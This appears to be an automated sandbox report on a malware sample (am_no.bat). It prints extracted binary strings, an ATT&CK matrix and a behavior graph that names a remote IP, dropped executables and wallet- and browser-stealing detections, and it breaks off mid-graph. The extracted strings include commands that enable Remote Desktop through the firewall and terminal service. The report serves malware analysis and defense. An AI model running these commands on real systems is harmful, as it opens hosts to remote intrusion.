RtLchm0m==QS1kewMqhAZPeUziQlrfhMCjdUEl7Dbwb91UMN5ZhwZhb0HqN0LwgLWl100oSTG=URdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8QZ7qeKLY42KF1USpQBDwbNtRewMuXkDoZN==QS1jdxMW3VHJYTZiYMB 0wMi30fkajrpdZVthMGpf1I57k45eNgmNJzvRBSXNwe2NYY=LNNkbMEr3ESoURdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8VT3mfJLi0rmb2U0gJXZPVvBFUvoSWSPATYu=URdJWuMJ1CLqbkPvd5nR42RnPBwgNZLzdcd 0NE9UkDuaTLBc0DugLGW0DQtSDLwVcda0M0FVy==XtsmNtr=RwNcZNMohDLgdEPmdp4xQqiJ2VEz5EL1aM1kRwNcZNMohDLgdEPmdp4xQqmJ2VEz5EL1aM1kUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTE7UbI9U1TtcjTrfIPjhsOge0V=UxBl0xMfhC3cbTS=M snPG==M soN7==M snO7==M soOG==QTNodcMqhCHWaTvhXq==O gWcdNk0wooQxGpZUfiLSk7IdJ8dSkneUvnIz7jKFZngXB I9scK9sWeUZgb0TXKGueOnZ82EMwBx==J9Q7SN9lhAG=I9scK9su3U2bIsQcJq==Uw1T0NAveETnbz3igJK=LMNU0MEXhEjqbkzsdJbhjXCp2USz7DLAaM6k0MHcPSXkbDSdKj==I7==cS RewIrh02bLUKdN0GeRF==cTIZdm==ccxk0w0pSSNVZc0dgkObTDD2d6LY2KCp2UozRTG=MtsmNtrWQRi=MtsmNtrWQhG=MtsmNtrWQhK=MtsmNtrWQ0W=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
                      Source: rapes.exeString found in binary or memory: net start termservice
                      Source: rapes.exe, 00000014.00000003.987805993.0000000004C40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: net start termservice
                      Source: rapes.exe, 00000014.00000003.987805993.0000000004C40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta131b127e996a898cd19ffb2d92e481b006700e5a2ab05704bbb0c589b88924d0921553d1dc176b36780331821e85866812981MJ5SM vtQw2sMQSrPj==LQXfPMklgFTVLZjr1JL2QsCffy==NIWoNG==UoSbcxLpJITieG==LINieG==YcAROJQf3kWVYN==ccxm0NDq3VfgUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMyMZVkZG==UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3WNEhggzOaDTpdFrEg7yb2VADUTJ8ddIXgy==UcNjYSTaJs0zMDHIRBjPKFZxQ8F8UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMycdNk0wooQxGbUxBl0TAdfVK=UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3VS9hfEubRj7p1JLwhB==JLNJSLAMYi7BSRvCLT==Xuxmdq==Uu1JWq==RQNKaMIWddEWcSIWbTEWYccWYNAWcwEWdMWWZwSWYNQWbxQWbS5Wc S=YTBb0sWgfEv3YZvmeFVigLyZYTBb0sWgfEu=YSpfdsWgfEu=Ztw=ZJw=ZJA=ZJE=TMxfc7==axJQdtfrPu==axJQdxD2Pw6=ZN bZwpiYSTacxEnbNFfecdmLTxRbMMWPwE+PwI+LRtieM5lflKqKokhIm==fq==JdNkbNH5PG==cS bcwnvQg3fbDu=aSNoccMoQxGpZDvpRSNQUcwWeVXgU0jwfJLrX16deu==UxBl0TAdfSPcdDD QLRrVRHcY07hdEbeepK=QNRfdcv=SSxpdwMug0r0IBve0j==RLFvWq==Uwxk0wvcY0TedUHmfKa=Rw1 ew0uMDbgYd==QLRxMpQmWw0W2UvOZTLYepbYjV==QcdQ0wMi3U3fZUG=Tc1oew0qUS1mbw0vQS1jcSIrVSdkSwMi3U3fZUG=MtwoNpHXRhaZON==ccA=dSA=QS1kewMqhAZPeUziQlrri1yRdVsl6kGwZc1ocISg2VPcOvzfd6Ls4LGphRRxEPQuLISjMIRpDGhtcSWW3U3VLRPme6rth7mRdU0yHfrnbTBjMMIdhEC2ID3edZK7NrS9gEvmHvrnaMpbccwp3RYdI7SARS0qhETpdzZRg0rjTnC9fFsw4TDidwdlc90r21PgdzZwfKzj311EFeRODGgjMIRpPQY=LISDD7==PTF d RtLchm0m==QS1kewMqhAZPeUziQlrfhMCjdUEl7Dbwb91UMN5ZhwZhb0HqN0LwgLWl100oSTG=URdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8QZ7qeKLY42KF1USpQBDwbNtRewMuXkDoZN==QS1jdxMW3VHJYTZiYMB 0wMi30fkajrpdZVthMGpf1I57k45eNgmNJzvRBSXNwe2NYY=LNNkbMEr3ESoURdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8VT3mfJLi0rmb2U0gJXZPVvBFUvoSWSPATYu=URdJWuMJ1CLqbkPvd5nR42RnPBwgNZLzdcd 0NE9UkDuaTLBc0DugLGW0DQtSDLwVcda0M0FVy==XtsmNtr=RwNcZNMohDLgdEPmdp4xQqiJ2VEz5EL1aM1kRwNcZNMohDLgdEPmdp4xQqmJ2VEz5EL1aM1kUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTE7UbI9U1TtcjTrfIPjhsOge0V=UxBl0xMfhC3cbTS=M snPG==M soN7==M snO7==M soOG==QTNodcMqhCHWaTvhXq==O gWcdNk0wooQxGpZUfiLSk7IdJ8dSkneUvnIz7jKFZngXB I9scK9sWeUZgb0TXKGueOnZ82EMwBx==J9Q7SN9lhAG=I9scK9su3U2bIsQcJq==Uw1T0NAveETnbz3igJK=LMNU0MEXhEjqbkzsdJbhjXCp2USz7DLAaM6k0MHcPSXkbDSdKj==I7==cS RewIrh02bLUKdN0GeRF==cTIZdm==ccxk0w0pSSNVZc0dgkObTDD2d6LY2KCp2UozRTG=MtsmNtrWQRi=MtsmNtrWQhG=MtsmNtrWQhK=MtsmNtrWQ0W=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
                      Source: rapes.exe, 00000014.00000002.1028077488.0000000000431000.00000040.00000001.01000000.0000000D.sdmpString found in binary or memory: net start termservice
                      Source: rapes.exe, 00000014.00000002.1028077488.0000000000431000.00000040.00000001.01000000.0000000D.sdmpString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta131b127e996a898cd19ffb2d92e481b006700e5a2ab05704bbb0c589b88924d0921553d1dc176b36780331821e85866812981MJ5SM vtQw2sMQSrPj==LQXfPMklgFTVLZjr1JL2QsCffy==NIWoNG==UoSbcxLpJITieG==LINieG==YcAROJQf3kWVYN==ccxm0NDq3VfgUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMyMZVkZG==UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3WNEhggzOaDTpdFrEg7yb2VADUTJ8ddIXgy==UcNjYSTaJs0zMDHIRBjPKFZxQ8F8UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMycdNk0wooQxGbUxBl0TAdfVK=UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3VS9hfEubRj7p1JLwhB==JLNJSLAMYi7BSRvCLT==Xuxmdq==Uu1JWq==RQNKaMIWddEWcSIWbTEWYccWYNAWcwEWdMWWZwSWYNQWbxQWbS5Wc S=YTBb0sWgfEv3YZvmeFVigLyZYTBb0sWgfEu=YSpfdsWgfEu=Ztw=ZJw=ZJA=ZJE=TMxfc7==axJQdtfrPu==axJQdxD2Pw6=ZN bZwpiYSTacxEnbNFfecdmLTxRbMMWPwE+PwI+LRtieM5lflKqKokhIm==fq==JdNkbNH5PG==cS bcwnvQg3fbDu=aSNoccMoQxGpZDvpRSNQUcwWeVXgU0jwfJLrX16deu==UxBl0TAdfSPcdDD QLRrVRHcY07hdEbeepK=QNRfdcv=SSxpdwMug0r0IBve0j==RLFvWq==Uwxk0wvcY0TedUHmfKa=Rw1 ew0uMDbgYd==QLRxMpQmWw0W2UvOZTLYepbYjV==QcdQ0wMi3U3fZUG=Tc1oew0qUS1mbw0vQS1jcSIrVSdkSwMi3U3fZUG=MtwoNpHXRhaZON==ccA=dSA=QS1kewMqhAZPeUziQlrri1yRdVsl6kGwZc1ocISg2VPcOvzfd6Ls4LGphRRxEPQuLISjMIRpDGhtcSWW3U3VLRPme6rth7mRdU0yHfrnbTBjMMIdhEC2ID3edZK7NrS9gEvmHvrnaMpbccwp3RYdI7SARS0qhETpdzZRg0rjTnC9fFsw4TDidwdlc90r21PgdzZwfKzj311EFeRODGgjMIRpPQY=LISDD7==PTF d RtLchm0m==QS1kewMqhAZPeUziQlrfhMCjdUEl7Dbwb91UMN5ZhwZhb0HqN0LwgLWl100oSTG=URdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8QZ7qeKLY42KF1USpQBDwbNtRewMuXkDoZN==QS1jdxMW3VHJYTZiYMB 0wMi30fkajrpdZVthMGpf1I57k45eNgmNJzvRBSXNwe2NYY=LNNkbMEr3ESoURdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8VT3mfJLi0rmb2U0gJXZPVvBFUvoSWSPATYu=URdJWuMJ1CLqbkPvd5nR42RnPBwgNZLzdcd 0NE9UkDuaTLBc0DugLGW0DQtSDLwVcda0M0FVy==XtsmNtr=RwNcZNMohDLgdEPmdp4xQqiJ2VEz5EL1aM1kRwNcZNMohDLgdEPmdp4xQqmJ2VEz5EL1aM1kUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTE7UbI9U1TtcjTrfIPjhsOge0V=UxBl0xMfhC3cbTS=M snPG==M soN7==M snO7==M soOG==QTNodcMqhCHWaTvhXq==O gWcdNk0wooQxGpZUfiLSk7IdJ8dSkneUvnIz7jKFZngXB I9scK9sWeUZgb0TXKGueOnZ82EMwBx==J9Q7SN9lhAG=I9scK9su3U2bIsQcJq==Uw1T0NAveETnbz3igJK=LMNU0MEXhEjqbkzsdJbhjXCp2USz7DLAaM6k0MHcPSXkbDSdKj==I7==cS RewIrh02bLUKdN0GeRF==cTIZdm==ccxk0w0pSSNVZc0dgkObTDD2d6LY2KCp2UozRTG=MtsmNtrWQRi=MtsmNtrWQhG=MtsmNtrWQhK=MtsmNtrWQ0W=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
                      Source: rapes.exeString found in binary or memory: net start termservice
                      Source: rapes.exe, 0000001C.00000003.1515506274.0000000004C00000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: net start termservice
                      Source: rapes.exe, 0000001C.00000003.1515506274.0000000004C00000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta131b127e996a898cd19ffb2d92e481b006700e5a2ab05704bbb0c589b88924d0921553d1dc176b36780331821e85866812981MJ5SM vtQw2sMQSrPj==LQXfPMklgFTVLZjr1JL2QsCffy==NIWoNG==UoSbcxLpJITieG==LINieG==YcAROJQf3kWVYN==ccxm0NDq3VfgUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMyMZVkZG==UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3WNEhggzOaDTpdFrEg7yb2VADUTJ8ddIXgy==UcNjYSTaJs0zMDHIRBjPKFZxQ8F8UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMycdNk0wooQxGbUxBl0TAdfVK=UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3VS9hfEubRj7p1JLwhB==JLNJSLAMYi7BSRvCLT==Xuxmdq==Uu1JWq==RQNKaMIWddEWcSIWbTEWYccWYNAWcwEWdMWWZwSWYNQWbxQWbS5Wc S=YTBb0sWgfEv3YZvmeFVigLyZYTBb0sWgfEu=YSpfdsWgfEu=Ztw=ZJw=ZJA=ZJE=TMxfc7==axJQdtfrPu==axJQdxD2Pw6=ZN bZwpiYSTacxEnbNFfecdmLTxRbMMWPwE+PwI+LRtieM5lflKqKokhIm==fq==JdNkbNH5PG==cS bcwnvQg3fbDu=aSNoccMoQxGpZDvpRSNQUcwWeVXgU0jwfJLrX16deu==UxBl0TAdfSPcdDD QLRrVRHcY07hdEbeepK=QNRfdcv=SSxpdwMug0r0IBve0j==RLFvWq==Uwxk0wvcY0TedUHmfKa=Rw1 ew0uMDbgYd==QLRxMpQmWw0W2UvOZTLYepbYjV==QcdQ0wMi3U3fZUG=Tc1oew0qUS1mbw0vQS1jcSIrVSdkSwMi3U3fZUG=MtwoNpHXRhaZON==ccA=dSA=QS1kewMqhAZPeUziQlrri1yRdVsl6kGwZc1ocISg2VPcOvzfd6Ls4LGphRRxEPQuLISjMIRpDGhtcSWW3U3VLRPme6rth7mRdU0yHfrnbTBjMMIdhEC2ID3edZK7NrS9gEvmHvrnaMpbccwp3RYdI7SARS0qhETpdzZRg0rjTnC9fFsw4TDidwdlc90r21PgdzZwfKzj311EFeRODGgjMIRpPQY=LISDD7==PTF d RtLchm0m==QS1kewMqhAZPeUziQlrfhMCjdUEl7Dbwb91UMN5ZhwZhb0HqN0LwgLWl100oSTG=URdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8QZ7qeKLY42KF1USpQBDwbNtRewMuXkDoZN==QS1jdxMW3VHJYTZiYMB 0wMi30fkajrpdZVthMGpf1I57k45eNgmNJzvRBSXNwe2NYY=LNNkbMEr3ESoURdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8VT3mfJLi0rmb2U0gJXZPVvBFUvoSWSPATYu=URdJWuMJ1CLqbkPvd5nR42RnPBwgNZLzdcd 0NE9UkDuaTLBc0DugLGW0DQtSDLwVcda0M0FVy==XtsmNtr=RwNcZNMohDLgdEPmdp4xQqiJ2VEz5EL1aM1kRwNcZNMohDLgdEPmdp4xQqmJ2VEz5EL1aM1kUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTE7UbI9U1TtcjTrfIPjhsOge0V=UxBl0xMfhC3cbTS=M snPG==M soN7==M snO7==M soOG==QTNodcMqhCHWaTvhXq==O gWcdNk0wooQxGpZUfiLSk7IdJ8dSkneUvnIz7jKFZngXB I9scK9sWeUZgb0TXKGueOnZ82EMwBx==J9Q7SN9lhAG=I9scK9su3U2bIsQcJq==Uw1T0NAveETnbz3igJK=LMNU0MEXhEjqbkzsdJbhjXCp2USz7DLAaM6k0MHcPSXkbDSdKj==I7==cS RewIrh02bLUKdN0GeRF==cTIZdm==ccxk0w0pSSNVZc0dgkObTDD2d6LY2KCp2UozRTG=MtsmNtrWQRi=MtsmNtrWQhG=MtsmNtrWQhK=MtsmNtrWQ0W=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
                      Source: rapes.exe, 0000001C.00000002.2109764248.0000000000431000.00000040.00000001.01000000.0000000D.sdmpString found in binary or memory: net start termservice
                      Source: rapes.exe, 0000001C.00000002.2109764248.0000000000431000.00000040.00000001.01000000.0000000D.sdmpString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta131b127e996a898cd19ffb2d92e481b006700e5a2ab05704bbb0c589b88924d0921553d1dc176b36780331821e85866812981MJ5SM vtQw2sMQSrPj==LQXfPMklgFTVLZjr1JL2QsCffy==NIWoNG==UoSbcxLpJITieG==LINieG==YcAROJQf3kWVYN==ccxm0NDq3VfgUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMyMZVkZG==UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3WNEhggzOaDTpdFrEg7yb2VADUTJ8ddIXgy==UcNjYSTaJs0zMDHIRBjPKFZxQ8F8UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMycdNk0wooQxGbUxBl0TAdfVK=UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3VS9hfEubRj7p1JLwhB==JLNJSLAMYi7BSRvCLT==Xuxmdq==Uu1JWq==RQNKaMIWddEWcSIWbTEWYccWYNAWcwEWdMWWZwSWYNQWbxQWbS5Wc S=YTBb0sWgfEv3YZvmeFVigLyZYTBb0sWgfEu=YSpfdsWgfEu=Ztw=ZJw=ZJA=ZJE=TMxfc7==axJQdtfrPu==axJQdxD2Pw6=ZN bZwpiYSTacxEnbNFfecdmLTxRbMMWPwE+PwI+LRtieM5lflKqKokhIm==fq==JdNkbNH5PG==cS bcwnvQg3fbDu=aSNoccMoQxGpZDvpRSNQUcwWeVXgU0jwfJLrX16deu==UxBl0TAdfSPcdDD QLRrVRHcY07hdEbeepK=QNRfdcv=SSxpdwMug0r0IBve0j==RLFvWq==Uwxk0wvcY0TedUHmfKa=Rw1 ew0uMDbgYd==QLRxMpQmWw0W2UvOZTLYepbYjV==QcdQ0wMi3U3fZUG=Tc1oew0qUS1mbw0vQS1jcSIrVSdkSwMi3U3fZUG=MtwoNpHXRhaZON==ccA=dSA=QS1kewMqhAZPeUziQlrri1yRdVsl6kGwZc1ocISg2VPcOvzfd6Ls4LGphRRxEPQuLISjMIRpDGhtcSWW3U3VLRPme6rth7mRdU0yHfrnbTBjMMIdhEC2ID3edZK7NrS9gEvmHvrnaMpbccwp3RYdI7SARS0qhETpdzZRg0rjTnC9fFsw4TDidwdlc90r21PgdzZwfKzj311EFeRODGgjMIRpPQY=LISDD7==PTF d RtLchm0m==QS1kewMqhAZPeUziQlrfhMCjdUEl7Dbwb91UMN5ZhwZhb0HqN0LwgLWl100oSTG=URdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8QZ7qeKLY42KF1USpQBDwbNtRewMuXkDoZN==QS1jdxMW3VHJYTZiYMB 0wMi30fkajrpdZVthMGpf1I57k45eNgmNJzvRBSXNwe2NYY=LNNkbMEr3ESoURdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8VT3mfJLi0rmb2U0gJXZPVvBFUvoSWSPATYu=URdJWuMJ1CLqbkPvd5nR42RnPBwgNZLzdcd 0NE9UkDuaTLBc0DugLGW0DQtSDLwVcda0M0FVy==XtsmNtr=RwNcZNMohDLgdEPmdp4xQqiJ2VEz5EL1aM1kRwNcZNMohDLgdEPmdp4xQqmJ2VEz5EL1aM1kUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTE7UbI9U1TtcjTrfIPjhsOge0V=UxBl0xMfhC3cbTS=M snPG==M soN7==M snO7==M soOG==QTNodcMqhCHWaTvhXq==O gWcdNk0wooQxGpZUfiLSk7IdJ8dSkneUvnIz7jKFZngXB I9scK9sWeUZgb0TXKGueOnZ82EMwBx==J9Q7SN9lhAG=I9scK9su3U2bIsQcJq==Uw1T0NAveETnbz3igJK=LMNU0MEXhEjqbkzsdJbhjXCp2USz7DLAaM6k0MHcPSXkbDSdKj==I7==cS RewIrh02bLUKdN0GeRF==cTIZdm==ccxk0w0pSSNVZc0dgkObTDD2d6LY2KCp2UozRTG=MtsmNtrWQRi=MtsmNtrWQhG=MtsmNtrWQhK=MtsmNtrWQ0W=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
                      Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exeCode function: 34_2_00981204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,34_2_00981204
                      Source: C:\Users\user\AppData\Local\Temp\10128560101\c6e8248d4e.exeCode function: 34_2_00981806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,34_2_00981806

                      Mitre Att&ck Matrix

                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity Information11
                      Scripting                      		2
                      Valid Accounts                      		121
                      Windows Management Instrumentation                      		11
                      Scripting                      		1
                      Exploitation for Privilege Escalation                      		421
                      Disable or Modify Tools                      		1
                      OS Credential Dumping                      		2
                      System Time Discovery                      		1
                      Remote Desktop Protocol                      		1
                      Archive Collected Data                      		12
                      Ingress Tool Transfer                      		Exfiltration Over Other Network Medium1
                      System Shutdown/Reboot
                      CredentialsDomainsDefault Accounts12
                      Native API                      		1
                      DLL Side-Loading                      		1
                      Abuse Elevation Control Mechanism                      		1
                      Deobfuscate/Decode Files or Information                      		21
                      Input Capture                      		11
                      Account Discovery                      		Remote Desktop Protocol31
                      Data from Local System                      		11
                      Encrypted Channel                      		Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain Accounts2
                      Command and Scripting Interpreter                      		2
                      Valid Accounts                      		1
                      DLL Side-Loading                      		1
                      Abuse Elevation Control Mechanism                      		Security Account Manager12
                      File and Directory Discovery                      		SMB/Windows Admin Shares1
                      Email Collection                      		1
                      Remote Access Software                      		Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal Accounts11
                      Scheduled Task/Job                      		11
                      Scheduled Task/Job                      		2
                      Bypass User Account Control                      		4
                      Obfuscated Files or Information                      		NTDS2410
                      System Information Discovery                      		Distributed Component Object Model21
                      Input Capture                      		3
                      Non-Application Layer Protocol                      		Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud Accounts2
                      PowerShell                      		11
                      Registry Run Keys / Startup Folder                      		1
                      Extra Window Memory Injection                      		12
                      Software Packing                      		LSA Secrets1091
                      Security Software Discovery                      		SSH3
                      Clipboard Data                      		114
                      Application Layer Protocol                      		Scheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts2
                      Valid Accounts                      		1
                      DLL Side-Loading                      		Cached Domain Credentials581
                      Virtualization/Sandbox Evasion                      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items21
                      Access Token Manipulation                      		2
                      Bypass User Account Control                      		DCSync3
                      Process Discovery                      		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/Job512
                      Process Injection                      		1
                      Extra Window Memory Injection                      		Proc Filesystem11
                      Application Window Discovery                      		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                      Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAt11
                      Scheduled Task/Job                      		11
                      Masquerading                      		/etc/passwd and /etc/shadow1
                      System Owner/User Discovery                      		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                      IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCron11
                      Registry Run Keys / Startup Folder                      		2
                      Valid Accounts                      		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                      Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd1
                      Modify Registry                      		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                      Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task581
                      Virtualization/Sandbox Evasion                      		KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking
                      Determine Physical LocationsVirtual Private ServerCompromise Hardware Supply ChainUnix ShellSystemd TimersSystemd Timers21
                      Access Token Manipulation                      		GUI Input CapturePermission Groups DiscoveryReplication Through Removable MediaEmail CollectionProxyExfiltration over USBNetwork Denial of Service
                      Business RelationshipsServerTrusted RelationshipVisual BasicContainer Orchestration JobContainer Orchestration Job512
                      Process Injection                      		Web Portal CaptureLocal GroupsComponent Object Model and Distributed COMLocal Email CollectionInternal ProxyCommonly Used PortDirect Network Flood
                      Identify Business TempoBotnetHardware AdditionsPythonHypervisorProcess Injection1
                      Mshta                      		Credential API HookingDomain GroupsExploitation of Remote ServicesRemote Email CollectionExternal ProxyTransfer Data to Cloud AccountReflection Amplification

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1632121 Sample: am_no.bat Startdate: 07/03/2025 Architecture: WINDOWS Score: 100 98 defaulemot.run 2->98 100 youtube.com 2->100 102 34 other IPs or domains 2->102 128 Suricata IDS alerts for network traffic 2->128 130 Found malware configuration 2->130 132 Antivirus detection for URL or domain 2->132 134 22 other signatures 2->134 10 rapes.exe 2->10         started        15 cmd.exe 3 2->15         started        17 19be97887a.exe 2->17         started        19 5 other processes 2->19 signatures3 process4 dnsIp5 108 176.113.115.6, 49690, 49691, 49693 SELECTELRU Russian Federation 10->108 84 C:\Users\user\AppData\...\60eb3ded99.exe, PE32 10->84 dropped 86 C:\Users\user\AppData\...\6f3323f1e6.exe, PE32 10->86 dropped 88 C:\Users\user\AppData\...\ab5415a7b5.exe, PE32 10->88 dropped 92 11 other malicious files 10->92 dropped 176 Contains functionality to start a terminal service 10->176 178 Creates multiple autostart registry keys 10->178 180 Hides threads from debuggers 10->180 182 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 10->182 21 19be97887a.exe 10->21         started        26 ab5415a7b5.exe 10->26         started        28 2qv26zF.exe 10->28         started        38 3 other processes 10->38 90 C:\Temp\mtzRdqIHD.hta, HTML 15->90 dropped 184 Uses schtasks.exe or at.exe to add and modify task schedules 15->184 186 Creates HTA files 15->186 30 mshta.exe 1 15->30         started        40 6 other processes 15->40 188 Found many strings related to Crypto-Wallets (likely being stolen) 17->188 190 Tries to harvest and steal browser information (history, passwords, etc) 17->190 192 Tries to steal Crypto Currency Wallets 17->192 32 chrome.exe 17->32         started        110 127.0.0.1 unknown unknown 19->110 194 Suspicious powershell command line found 19->194 196 Tries to download and execute files (via powershell) 19->196 198 